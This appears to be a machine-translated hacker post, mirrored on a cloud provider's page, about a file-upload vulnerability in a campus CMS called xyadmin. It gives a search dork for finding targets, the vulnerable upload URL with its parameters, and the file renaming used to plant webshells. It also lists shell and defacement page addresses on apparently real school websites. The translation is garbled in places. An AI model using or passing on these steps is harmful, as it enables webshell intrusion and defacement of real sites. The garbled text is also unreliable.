This is due to the WCMS System (xyadmin) Upload Vulnerability on the campus network.

Source: Internet
Author: User

Dark visitorCampus Network CMS system (xyadmin) Upload Vulnerability
Google Keyword: inurl: xyadmin
Our tool is g.cn google hack.
Let's just click a connection.
This is the upload page xyadmin/situjiaduotu. asp? Formname=baseinfoform&editname=logol&uppath=baseinfo&filelx;.swf.gif.jpg
Magana shell
Xyadmin is short for campus
Can other types, such as xxadmin, be used?
Http://up.2cto.com/Article/200909/20090925202428163.jpg

Zookeeper opener.doc ument. baseinfoform. logol. value = xyadmin/baseinfo/sam beautification utility kill Trojan. asp
Window. alert ("File Uploaded successfully! Do not modify the generated link address! ");
Window. close ();
Http://up.2cto.com/Article/200909/20090925202429433.jpg
Shell addressHttp://www.dslsxx.cn/xyadmin/baseinfo/conn.asp
Black pageHttp://www.dslsxx.cn/conn.asp


Http://up.2cto.com/Article/200909/20090925202431855.jpg
Encounter
Window. alert ("File Uploaded successfully! Do not modify the generated link address! ");
Window. close ();
The path cannot be found ~~~

Http://jpkc.aqvtc.cn: 8081/xyadmin/situjiaduotu. asp? Formname=baseinfoform&editname=logol&uppath=baseinfo&filelx;.swf.gif.jpg
Required parameter opener.doc ument. baseinfoform. logol. value =
Xyadmin/baseinfo/conn. asa
Window. alert ("File Uploaded successfully! Do not modify the generated link address! ");
Window. close ();
Http://jpkc.aqvtc.cn: 8081This website
Http://jpkc.aqvtc.cn: 8081/xyadmin/baseinfo/conn. asa
Black pageHttp://jpkc.aqvtc.cn: 8081/conn. asp


Http://up.2cto.com/Article/200909/20090925202437657.jpg
Http://up.2cto.com/Article/200909/20090925202438253.jpg
Required parameter opener.doc ument. baseinfoform. logol. value =
Xyadmin/baseinfo/conn. asa
Window. alert ("File Uploaded successfully! Do not modify the generated link address! ");
Window. close ();
Shell addressHttp://www.lbkjb.com/xyadmin/baseinfo/conn.asa
Black page addressHttp://www.lbkjb.com/EDW.asp

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.